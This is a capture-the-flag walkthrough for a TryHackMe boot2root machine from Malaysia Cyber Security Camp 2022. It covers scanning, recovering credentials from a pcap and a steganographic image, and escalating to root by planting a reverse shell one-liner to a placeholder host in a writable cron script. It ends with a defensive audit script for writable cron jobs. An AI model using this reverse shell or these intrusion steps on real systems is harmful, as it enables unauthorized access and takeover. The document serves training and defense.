{THM} S1mple0nly b2root
MCC 2022 Assignment (Easy)
Last updated
Simpleonly b2root is an easy-difficulty boot2root machine created by the crew for Malaysia Cyber Security Camp (MCC) 2022: First Edition as an assignment hosted on TryHackMe. You can access it here.
This was a fun little box with some funny and tricky twists, much like its creator :D. It was an "easy" machine, but it made me notice that my own machine had a bug where it could not complete an SSH connection.
The bug showed up in the SSH debug output as:
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
Fixed with:
sudo ip li set mtu 1200 dev tun0
(A hang at that key-exchange step is the classic symptom of oversized packets being dropped on the VPN tunnel, so lowering the MTU on tun0 lets the key exchange complete.)
Let's start. Launch the machine and it will provide an IP.
We start with an nmap, as is almost always the case. We'll run a basic nmap, followed by a "-sV -sC" version of the same, and save it with "-oN simpleonly.txt".
nmap -sC -sV -A ip_machine -oN Simple.txt
From the nmap scan we notice three ports are open. Ports 21 and 22 are well-known services that normally should not be exposed. The scan also shows that port 21 (FTP) accepts anonymous login.
Download the pcap file and analyse it.
From the pcap file, I found a credential by luck.
Next, let's move to port 80.
Use the credential we got from the pcap file earlier, and it will take us to the main page.
Oh damn!! There is nothing here. Let's move on to directory scanning.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://ipmachine
The scan shows some interesting paths. Let's look at them one by one.
admin shows this image.
This dictionary contains a lot of possible passwords. Let's download it.
Gotcha, we notice blackcat.jpg is the same image as the one on /admin.php. Let's download it and scratch the meoww.
I like to check the file type and run binwalk to see whether any file is embedded in it. For this image there is nothing, just a normal JPEG.
Moving on to cracking the image to find valuable information. I use stegcracker:
stegcracker blackcat.jpg complete_meowlist.txt
Yeah!! We got a credential. Remember from the port scan that SSH is open. Let's try the credential to get access.
BOOM!! We're in. Let's find the user flag. Next we proceed to privilege escalation.
From basic searching, I noticed a script.sh file. After checking it, it turned out to be an automation script that runs at set times, and further investigation showed the shell script could be modified.
Copy this payload into the shell file, then open netcat to listen on the port.
sh -i >& /dev/tcp/IP_MACHINE/8787 0>&1
Yeah, we're in and have root.
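The root path above rests on one misconfiguration: a script run on a schedule that a non-root user can write to. As an added example (not part of the original writeup or the box), the following audit script reports any script referenced from crontab-style lines that is group- or world-writable; it assumes user-crontab format (command in the sixth field) and builds its own constructed fixture in a temporary directory.

```shell
#!/bin/sh
# Defender-side audit: which scripts referenced from crontab lines are
# writable by someone other than their owner (group- or world-writable)?
# Assumes user-crontab format "m h dom mon dow command" (command is field 6);
# /etc/crontab has an extra user field and would need $7 instead.

# Print absolute script paths from the crontab lines in file $1.
cron_script_paths() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' \
        | awk '{ print $6 }' | grep '^/'
}

# Return 0 if file $1 is group- or world-writable, 1 otherwise.
# Parses the ls -l mode string (group write = position 6, other write =
# position 9), so it works on GNU and BSD userlands alike.
is_writable_by_others() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in
        ?????w*|????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# Print one line per cron-invoked script that is missing or writable by
# others; return 1 if any writable script was found, else 0.
audit_cron_scripts() {
    found=0
    for f in $(cron_script_paths "$1"); do   # paths without spaces assumed
        if [ ! -e "$f" ]; then
            echo "MISSING  $f"
        elif is_writable_by_others "$f"; then
            echo "WRITABLE $f ($(ls -ld "$f" | cut -c1-10))"
            found=1
        fi
    done
    return $found
}

# Constructed fixture (not from the box): one sane script and one left
# world-writable, the way the writeup describes script.sh on the target.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
printf '#!/bin/sh\necho backup\n'  > "$demo_dir/backup.sh"; chmod 755 "$demo_dir/backup.sh"
printf '#!/bin/sh\necho cleanup\n' > "$demo_dir/script.sh"; chmod 777 "$demo_dir/script.sh"
cat > "$demo_dir/crontab.txt" <<EOF
# constructed sample crontab
*/5 * * * * $demo_dir/script.sh
0 2 * * *   $demo_dir/backup.sh
EOF
audit_cron_scripts "$demo_dir/crontab.txt" \
    || echo "FIX: chown root and chmod go-w the files listed above"
```

The same checks apply to any scheduled job, including systemd timers and the scripts they call: the job owner and the script owner should match, and nobody else should hold write permission on the script or its directory.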
Thank YOU.